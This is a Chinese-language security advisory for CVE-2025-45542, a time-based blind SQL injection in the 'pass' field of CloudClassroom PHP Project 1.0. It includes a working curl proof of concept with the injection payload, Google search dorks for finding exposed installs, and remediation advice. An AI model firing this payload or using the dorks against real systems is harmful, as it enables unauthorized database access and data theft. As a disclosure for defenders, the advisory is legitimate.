CloudClassroom PHP项目1.0 SQL注入漏洞

发布日期: 2025.06.04
作者: Sanjay Singh
风险等级: 中等
攻击类型: 远程攻击
CVE编号: CVE-2025-45542

漏洞概述

CloudClassroom PHP项目1.0版本中存在一个时间盲注SQL注入漏洞，该漏洞位于registrationform端点中的pass参数。由于该参数未经过充分过滤，未经身份验证的远程攻击者可以操纵后端SQL逻辑，并可能提取敏感信息。

漏洞详情

受影响产品: CloudClassroom PHP项目
供应商: https://github.com/mathurvishal/CloudClassroom-PHP-Project
受影响版本: v1.0
漏洞类型: SQL注入
发现者: Sanjay Singh

漏洞利用

概念验证

攻击者可以通过发送包含恶意负载的POST请求来利用此漏洞：

1
2
3

curl -X POST http://localhost/CloudClassroom-PHP-Project-master/registrationform \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "addrs=3137%20Laguna%20Street&course=1&dob=1967/1/1&email=testing@example.com&faname=test&fname=test&gender=Female&lname=test&pass=u]H[ww6KrA9F.x-F0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z&phno=94102&sub="

恶意负载：'XOR(if(now()=sysdate(),sleep(6),0))XOR'

当SQL条件为真时，服务器响应将延迟，从而确认注入点存在。

影响范围

成功利用此漏洞可能导致：

• 任意SQL语句执行
• 敏感信息泄露
• 特定条件下的身份验证绕过

修复建议

• 使用参数化查询和预处理语句
• 使用mysqli_real_escape_string()或类似函数对输入进行过滤
• 部署Web应用防火墙(WAF)
• 对应用程序的数据库用户实施最小权限原则

参考链接

• GitHub仓库: https://github.com/mathurvishal/CloudClassroom-PHP-Project
• Exploit-DB提交（待批准）
• GHDB搜索语句: inurl:"CloudClassroom-PHP-Project-master" intitle:"Cloud Classroom"

技术环境

测试环境: Windows 10 / Ubuntu 22.04上的XAMPP
Google搜索关键词: inurl:CloudClassroom-PHP-Project-master